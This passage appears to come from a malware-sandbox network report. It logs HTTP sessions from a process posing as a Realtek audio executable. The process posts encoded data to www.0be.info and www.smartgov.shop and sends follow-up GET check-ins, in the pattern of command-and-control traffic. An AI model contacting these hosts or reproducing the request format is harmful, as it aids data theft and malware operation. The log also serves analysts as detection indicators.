                                                                                                                                                                                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.362385035 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                37192.168.11.2049796173.0.157.187807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.631959915 CET668OUTPOST /8h0h/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.0be.info
                                                                                                                                                                                                                                Referer: http://www.0be.info/8h0h/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 62 75 31 37 6d 67 59 79 62 52 47 72 46 37 46 76 64 38 4e 55 4d 70 66 75 77 2f 38 4c 6f 54 56 6b 65 34 4f 7a 46 74 34 50 4e 4d 71 74 53 68 62 48 66 51 35 65 78 5a 77 4c 47 34 34 65 6d 34 43 74 70 59 54 39 66 4a 67 43 34 47 56 70 68 74 53 6f 30 34 5a 64 5a 46 2b 34 53 37 6d 54 2f 62 78 4b 61 64 7a 47 37 6f 51 54 49 4d 51 73 69 58 70 32 67 39 53 48 62 71 4e 57 66 6e 63 6d 35 58 6a 73 59 6e 51 30 41 50 4d 75 79 36 36 36 79 56 76 33 64 42 79 72 64 2b 64 77 32 32 34 4f 72 68 33 46 63 69 74 49 75 56 6a 58 4b 2f 46 35 46 41 56 2f 67 78 5a 4c 4d 42 4a 32 72 2b 78 38 5a 39 62 50 6b 77 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=bu17mgYybRGrF7Fvd8NUMpfuw/8LoTVke4OzFt4PNMqtShbHfQ5exZwLG44em4CtpYT9fJgC4GVphtSo04ZdZF+4S7mT/bxKadzG7oQTIMQsiXp2g9SHbqNWfncm5XjsYnQ0APMuy666yVv3dByrd+dw224Orh3FcitIuVjXK/F5FAV/gxZLMBJ2r+x8Z9bPkw==
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.878046989 CET262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:59 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 23V,VH(,JM0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                38192.168.11.2049797173.0.157.187807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.295325041 CET688OUTPOST /8h0h/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.0be.info
                                                                                                                                                                                                                                Referer: http://www.0be.info/8h0h/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 62 75 31 37 6d 67 59 79 62 52 47 72 55 6f 4e 76 51 2f 6c 55 4f 4a 66 70 73 76 38 4c 39 6a 56 65 65 34 43 7a 46 6f 42 4b 4e 2f 4f 74 52 45 6e 48 63 53 64 65 32 5a 77 4c 65 49 34 58 35 6f 44 41 70 59 65 4f 66 49 63 43 34 47 52 70 68 76 61 6f 31 50 46 65 59 56 2b 36 4b 4c 6d 64 37 62 78 4b 61 64 7a 47 37 73 77 39 49 49 38 73 6c 6d 35 32 6a 5a 47 47 45 61 4e 56 50 33 63 6d 72 6e 6a 53 59 6e 52 5a 41 4f 67 51 79 35 43 36 79 51 72 33 64 56 6d 6b 45 75 64 32 37 57 34 59 71 68 47 73 63 77 68 45 39 6b 66 35 54 4e 31 59 4e 32 59 6c 39 44 74 76 50 53 56 45 76 4f 49 55 62 2f 61 55 35 7a 31 2f 62 7a 50 55 44 32 44 53 59 47 58 6c 6e 78 6b 59 55 74 30 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=bu17mgYybRGrUoNvQ/lUOJfpsv8L9jVee4CzFoBKN/OtREnHcSde2ZwLeI4X5oDApYeOfIcC4GRphvao1PFeYV+6KLmd7bxKadzG7sw9II8slm52jZGGEaNVP3cmrnjSYnRZAOgQy5C6yQr3dVmkEud27W4YqhGscwhE9kf5TN1YN2Yl9DtvPSVEvOIUb/aU5z1/bzPUD2DSYGXlnxkYUt0=
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.514297962 CET262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:02 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 23V,VH(,JM0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                39192.168.11.2049798173.0.157.187807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:04.969482899 CET1289OUTPOST /8h0h/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.0be.info
                                                                                                                                                                                                                                Referer: http://www.0be.info/8h0h/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 62 75 31 37 6d 67 59 79 62 52 47 72 55 6f 4e 76 51 2f 6c 55 4f 4a 66 70 73 76 38 4c 39 6a 56 65 65 34 43 7a 46 6f 42 4b 4e 2f 47 74 53 32 2f 48 65 7a 64 65 33 5a 77 4c 54 6f 34 61 35 6f 43 43 70 59 48 6d 66 49 52 31 34 41 4e 70 75 71 57 6f 79 39 74 65 52 56 2b 36 57 37 6d 51 2f 62 78 6c 61 64 6a 43 37 6f 55 39 49 49 38 73 6c 6c 52 32 31 39 53 47 43 61 4e 57 66 6e 63 51 35 58 6a 70 59 6e 4a 6e 41 4f 56 72 79 70 69 36 79 77 37 33 66 6d 65 6b 62 2b 64 30 2b 57 35 62 71 68 4b 33 63 7a 55 39 39 6e 44 58 54 4b 42 59 4e 33 34 35 6e 52 39 51 4e 69 45 4c 76 2f 59 74 59 5a 4f 4c 39 53 39 35 62 53 44 6c 4d 7a 76 36 53 56 7a 39 7a 77 77 2f 4e 64 59 7a 4e 38 73 4d 79 72 4f 79 46 6f 4b 41 7a 61 42 30 6f 49 37 56 34 44 5a 34 4b 66 59 74 6d 71 31 43 76 45 39 61 58 5a 43 43 55 7a 35 75 36 5a 54 45 48 72 5a 38 41 31 74 4f 78 65 36 73 4d 34 4b 65 6d 77 42 4e 44 57 75 67 43 6d 4b 79 59 41 46 4a 7a 66 6e 69 53 53 4f 5a 6f 37 4b 37 59 2f 6f 4f 75 31 4c 68 49 77 39 66 32 48 2f 52 65 4f 4a 58 75 33 45 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=bu17mgYybRGrUoNvQ/lUOJfpsv8L9jVee4CzFoBKN/GtS2/Hezde3ZwLTo4a5oCCpYHmfIR14ANpuqWoy9teRV+6W7mQ/bxladjC7oU9II8sllR219SGCaNWfncQ5XjpYnJnAOVrypi6yw73fmekb+d0+W5bqhK3czU99nDXTKBYN345nR9QNiELv/YtYZOL9S95bSDlMzv6SVz9zww/NdYzN8sMyrOyFoKAzaB0oI7V4DZ4KfYtmq1CvE9aXZCCUz5u6ZTEHrZ8A1tOxe6sM4KemwBNDWugCmKyYAFJzfniSSOZo7K7Y/oOu1LhIw9f2H/ReOJXu3E09S8SnAXp5nJl+Gy41GMgOb+UZtJD6E/AMiX5qBQFG8H2yvqpvDta9FKAIAWgjGMZk7aE3exR1IgueOcAm4Bt1nYKcYXrOVhmd8GdxRJAfbj1AOGRUuF0bhdlX/6Hdu7YFEjygZ6XzSAw+t5E68zBsJIeLax3/NpbQ5igBEL/0X6HOoBLXfFwrxYp9nNifgp4/CQWdOo41HkvJ8JnXeP0zQQytEAFv0XOi26Wulnz15pl//ZfN9kY62gvt3k/6KDPw98Wpr2U6rgkMsjmENPTCu844JCWxd/mW0O2+y1hrDGCrZ7ajWiiMXw1DeN/bUfPxWcOkPP8wRy9BUi2+a6nrJIjhe2BaWSh+2XyuwVijIEuSCGViA0VPm8th2Qwp2jUXczZFQLD09pgxY89yLoVfYlYoCV1RwPVBBVLGGlFg1YGI5cQ4ZxhffrxetblXn0tu3XCDQ7yucP8D6AfZ9lWbyU1N76lha9wASNN
                                                                                                                                                                                                                                Dec 3, 2024 14:54:04.969508886 CET6548OUTData Raw: 65 41 37 36 73 4e 4c 52 4a 64 55 68 2b 4a 43 4e 79 78 39 42 65 35 52 30 65 68 34 4a 39 4f 66 67 4e 59 75 77 68 69 4f 70 63 61 33 46 71 4e 41 33 7a 56 43 31 67 35 32 6f 35 44 6f 47 74 4e 49 36 6d 6b 68 7a 51 57 70 65 34 76 51 43 6c 4e 4d 53 75 69
                                                                                                                                                                                                                                Data Ascii: eA76sNLRJdUh+JCNyx9Be5R0eh4J9OfgNYuwhiOpca3FqNA3zVC1g52o5DoGtNI6mkhzQWpe4vQClNMSuicKTSXp47VMVRqyxLZSCkPkLgnoHqMr0wmZP4a3ec+UXrliWJedytzevwbaocacGtEaqTfDoI1Bf9dLvlffcGUCvL6Vh7WTPLGLB+W7qiu5QgTbpF321v/sVU8X4afEbfTpwYRUTxEhVdxP9oZKkYwe7x5/ZP/EP9U
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.199466944 CET262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:05 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 23V,VH(,JM0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                40192.168.11.2049799173.0.157.187807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.636315107 CET415OUTGET /8h0h/?pluxVm=WsdblX5oKRyaFeduXpZZBYfr3KMp+WtxHr+UJvo5A+6DW3eJEDxswcp5ZYJtgZW5p4zYKJkjyVN2mc228t1VZlr/R5LO29syDvrfnZcSIMlt6XRuzenYE6E=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.868633032 CET217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Data Raw: 66 0d 0a 4c 69 6e 6b 20 69 73 20 65 78 70 69 72 65 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: fLink is expired0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                41192.168.11.204980013.248.169.48807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.115884066 CET683OUTPOST /1cwp/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.smartgov.shop
                                                                                                                                                                                                                                Referer: http://www.smartgov.shop/1cwp/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 68 4b 74 39 6a 58 36 36 53 79 30 31 6c 73 4c 46 48 68 75 6b 53 71 62 49 6e 68 32 41 61 61 6f 36 65 77 78 44 54 49 70 74 59 51 79 61 58 77 49 73 71 35 50 76 4c 31 72 78 4d 77 4b 62 66 48 6d 70 35 32 6a 70 6f 71 59 75 50 2f 7a 71 58 2f 35 6b 44 7a 46 51 31 30 6d 63 41 41 48 35 38 53 49 37 6a 2b 55 55 68 36 33 76 37 2b 4b 6c 71 5a 6c 48 62 78 4e 42 75 61 73 4c 79 53 6c 59 56 37 50 2f 78 78 4b 56 52 75 65 62 63 56 73 59 79 48 6a 46 45 75 79 6b 51 31 31 55 70 52 2f 6b 52 41 68 6e 76 4f 2f 6d 56 4f 55 75 48 4e 70 47 68 56 62 44 63 34 72 34 73 5a 50 74 50 59 42 4f 34 61 2b 33 6f 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=hKt9jX66Sy01lsLFHhukSqbInh2Aaao6ewxDTIptYQyaXwIsq5PvL1rxMwKbfHmp52jpoqYuP/zqX/5kDzFQ10mcAAH58SI7j+UUh63v7+KlqZlHbxNBuasLySlYV7P/xxKVRuebcVsYyHjFEuykQ11UpR/kRAhnvO/mVOUuHNpGhVbDc4r4sZPtPYBO4a+3oQ==


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                42192.168.11.204980113.248.169.48807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.750148058 CET703OUTPOST /1cwp/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.smartgov.shop
                                                                                                                                                                                                                                Referer: http://www.smartgov.shop/1cwp/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 68 4b 74 39 6a 58 36 36 53 79 30 31 6b 4e 37 46 45 47 36 6b 44 36 62 4a 2b 42 32 41 44 71 6f 2b 65 77 39 44 54 4e 49 77 59 6a 47 61 58 52 34 73 72 38 37 76 4f 31 72 78 55 67 4b 6b 53 6e 6d 75 35 32 76 62 6f 71 55 75 50 2f 6e 71 58 36 56 6b 44 45 52 54 7a 6b 6d 65 4a 67 48 33 78 79 49 37 6a 2b 55 55 68 36 79 36 37 2b 53 6c 71 70 31 48 61 51 4e 43 6e 36 73 4d 34 79 6c 59 44 4c 50 37 78 78 4b 6e 52 76 53 68 63 58 55 59 79 44 76 46 45 37 65 6a 5a 31 31 61 30 68 2b 52 5a 79 77 31 33 4f 54 50 54 63 45 42 66 75 74 52 74 6a 57 5a 42 4b 66 63 76 4b 54 66 4c 6f 34 6d 36 59 2f 73 31 64 46 62 68 34 30 68 49 46 34 69 75 67 4b 55 42 30 51 39 49 36 6f 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=hKt9jX66Sy01kN7FEG6kD6bJ+B2ADqo+ew9DTNIwYjGaXR4sr87vO1rxUgKkSnmu52vboqUuP/nqX6VkDERTzkmeJgH3xyI7j+UUh6y67+Slqp1HaQNCn6sM4ylYDLP7xxKnRvShcXUYyDvFE7ejZ11a0h+RZyw13OTPTcEBfutRtjWZBKfcvKTfLo4m6Y/s1dFbh40hIF4iugKUB0Q9I6o=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                43192.168.11.204980213.248.169.48807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.386698008 CET6445OUTPOST /1cwp/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.smartgov.shop
                                                                                                                                                                                                                                Referer: http://www.smartgov.shop/1cwp/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 68 4b 74 39 6a 58 36 36 53 79 30 31 6b 4e 37 46 45 47 36 6b 44 36 62 4a 2b 42 32 41 44 71 6f 2b 65 77 39 44 54 4e 49 77 59 6a 65 61 57 6a 77 73 72 66 6a 76 4e 31 72 78 4b 77 4b 68 53 6e 6e 72 35 32 6e 66 6f 71 70 54 50 38 66 71 56 59 64 6b 46 31 52 54 36 6b 6d 65 45 41 48 36 38 53 49 75 6a 2b 46 54 68 36 43 36 37 2b 53 6c 71 76 78 48 65 42 4e 43 68 36 73 4c 79 53 6c 4d 56 37 50 54 78 78 53 33 52 76 58 65 64 6d 30 59 79 6e 44 46 58 64 71 6a 45 46 31 50 6b 78 2b 4a 5a 79 39 72 33 4f 50 35 54 64 67 76 66 74 64 52 37 45 6a 68 54 49 54 69 37 5a 47 53 57 49 73 6b 77 62 62 5a 37 64 46 37 76 34 52 4e 4f 6a 63 4a 73 42 4b 45 45 6b 73 6c 5a 4e 37 39 4f 65 56 6e 77 34 63 33 76 41 4b 2f 6e 68 4e 53 34 6f 33 64 42 7a 38 43 41 52 55 75 75 4c 30 32 30 53 43 57 4d 33 50 57 6e 6a 74 30 36 6c 4c 6a 47 48 58 59 44 32 46 64 4a 36 50 36 37 55 4d 57 78 72 53 71 4b 4f 6e 43 76 37 52 77 68 57 6d 4c 34 37 39 39 65 72 52 61 33 43 70 35 72 48 4e 4b 6e 67 46 31 6f 4a 41 66 73 55 48 72 69 70 57 4a 69 79 54 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=hKt9jX66Sy01kN7FEG6kD6bJ+B2ADqo+ew9DTNIwYjeaWjwsrfjvN1rxKwKhSnnr52nfoqpTP8fqVYdkF1RT6kmeEAH68SIuj+FTh6C67+SlqvxHeBNCh6sLySlMV7PTxxS3RvXedm0YynDFXdqjEF1Pkx+JZy9r3OP5TdgvftdR7EjhTITi7ZGSWIskwbbZ7dF7v4RNOjcJsBKEEkslZN79OeVnw4c3vAK/nhNS4o3dBz8CARUuuL020SCWM3PWnjt06lLjGHXYD2FdJ6P67UMWxrSqKOnCv7RwhWmL4799erRa3Cp5rHNKngF1oJAfsUHripWJiyTf+LBUHTSbCGNpSvUQnrVRowGQUzhBm8+wIMJuB6l1dK7VjKyadqD9r+kqHYqhcYfaLBEOs3jHELxhq82XEBFs+e7skp8NX5tjoaY3XuM8of6iCH75TapuGjkdgBNa9W0jA8xwqb65ZlrSUil0ELHBcjASOOtRaCcEFOIv9Vkyb0E5jeXh1zzai5GX762m2Srkm4W0eaVoaW8MreQ6e64oBJpTZ5d4nePc95UwJ09nFtOusWSX/ORn46Z8hSjjCgbo3BqHyBtHsx0ZrsmbK4ddgHuBM0jbLo9RGHb4teBU7HxuSWYLwgnWFFgC3mlI9wFHcsqH27gHwQ6KvWWbAFzxUR2v6VZAJbwqTwP1xPhjgGWmWxKayXWT9YwczuBi6whdX2/V15x4Fa36P9pBxJcwwImaU2+i+HIb6VjYEfCKj59msB+n7gBzPLcAnQVBxRmYSGrHX8ujb4Sozr9RRLgYjytwfDVxf1QT+cXpyK9Q4pKllY9tWXmQPRICt06O/kO6otznblF0vpnuQqWQ+WRSPBehTnoS1hvlYviUzkn3KkKS7D7AVqRoYmmu6aMC/MVvCDLjbz0EJdi2TSQDK2OQ1GSrUIlBsGQS2oIdbBk0m3KUl7W/MhpzdptNGG/qkJGGSnec/0HJC5wMEQzzp8q2DGuo5g2AIhVno [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.386756897 CET1289OUTData Raw: 58 67 44 47 74 71 4d 4e 66 34 79 46 61 42 38 52 33 7a 78 70 74 43 62 61 39 70 50 31 44 69 68 74 6b 2b 38 4f 31 6b 4c 49 58 76 63 73 4c 63 49 58 50 2f 72 71 6f 38 6c 64 48 35 35 70 51 52 67 47 43 39 73 37 4c 32 36 53 73 4c 33 57 4a 41 45 52 4a 79
                                                                                                                                                                                                                                Data Ascii: XgDGtqMNf4yFaB8R3zxptCba9pP1Dihtk+8O1kLIXvcsLcIXP/rqo8ldH55pQRgGC9s7L26SsL3WJAERJyXJaGhNVryqywVlTglcgm6V4Z/01UaqNtfS9mPBqOuwHwuspjDLO9FiPBWDu3dYVXBm3nd4Hmtb1T2dB5JASlpmTJENa1BTRXSxL9S3td2Qftk0Um08yV6k27+NVC+4n81fgKLkq1XVpT+EpejHC+pwE7XfsOWt7Gc
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.386825085 CET118OUTData Raw: 6e 35 4f 30 38 63 37 52 46 4b 56 62 7a 4e 77 6f 78 39 46 52 4c 5a 56 78 59 59 64 62 48 41 44 69 57 59 51 54 49 2f 73 55 35 58 33 42 41 33 53 47 6d 2b 43 33 6b 35 34 50 6d 4c 4f 6a 66 50 45 51 44 32 41 73 38 72 42 79 39 46 48 56 68 5a 35 53 58 31
                                                                                                                                                                                                                                Data Ascii: n5O08c7RFKVbzNwox9FRLZVxYYdbHADiWYQTI/sU5X3BA3SGm+C3k54PmLOjfPEQD2As8rBy9FHVhZ5SX1u4WGVyV968avjMntL+lOsCMRxoNjmZb/kw==


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                44192.168.11.204980313.248.169.48807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.030231953 CET420OUTGET /1cwp/?Z1EO=OvfHeluUy&pluxVm=sIFdgnO3FyIHooXZAGWnPd64nEiNYbQbKjddbfNFYhaUQRED9832NCT0LRXwdwmN50zS64Z/ENDcZJBcOGN8yjbqMhS05UVN1tB36ILI/fWY5OM6Vh1joIo= HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.141648054 CET397INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 257
                                                                                                                                                                                                                                Connection: close
